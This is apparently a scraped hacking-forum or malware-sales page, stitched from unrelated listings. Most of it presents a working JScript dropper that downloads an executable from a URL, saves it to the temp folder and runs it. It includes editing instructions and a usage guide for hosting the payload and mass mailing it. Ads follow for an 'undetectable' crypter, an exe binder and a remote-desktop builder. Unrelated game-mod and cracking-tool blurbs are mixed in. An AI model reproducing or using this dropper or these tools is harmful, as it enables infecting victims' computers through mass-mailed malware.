🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.
1️⃣ Download Payload
The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).
var fileUrl = "https://url.com/windows.exe";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();
2️⃣ Save the Payload
The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.
var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();
3️⃣ Execute the Payload
After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:
➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.
if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}
🦅 To edit the script, edit line...
➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)
👉Fully Customizable
👉Source Code
👉Easy-To-Use
❔How to use
👉Download Apache and create a webserver on your linux/windows RDP.
👉Get your requirements for mailing ready and start the mailer.
Red Binder:
▪️Exe Binder
▪️Inbuilt Undetectable Crypter
▪️Any malware inject with crypter
Red Desktop Builder:
▪️Fully undetectable
▪️Use any installed exe in pc
▪️Use chrome, firefox (Download and execute any file)
▪️View File Explorer
Old Black Ops 2 Mod Menu. Source code for coders to see how a menu was made in earlier call of duty's
To use this "Mod Menu" if you have a modded console such as PS3, XBOX or Desktop PC, you need to download GSC studio. It's deprecated but archive.org have a backup
GSC Studio : https://archive.org/download/setup-gscstudio-160215_202109/setup-gscstudio-160215.exe
You can find on Youtube tutorial about injecting a gsc file
This tool is a combo editor with 33 editing module, fast speed and a hot UI created by Zentred from cracked(.)io - a hacker forum.
Preview of the tool : https://i.imgur.com/SLh8JVG.png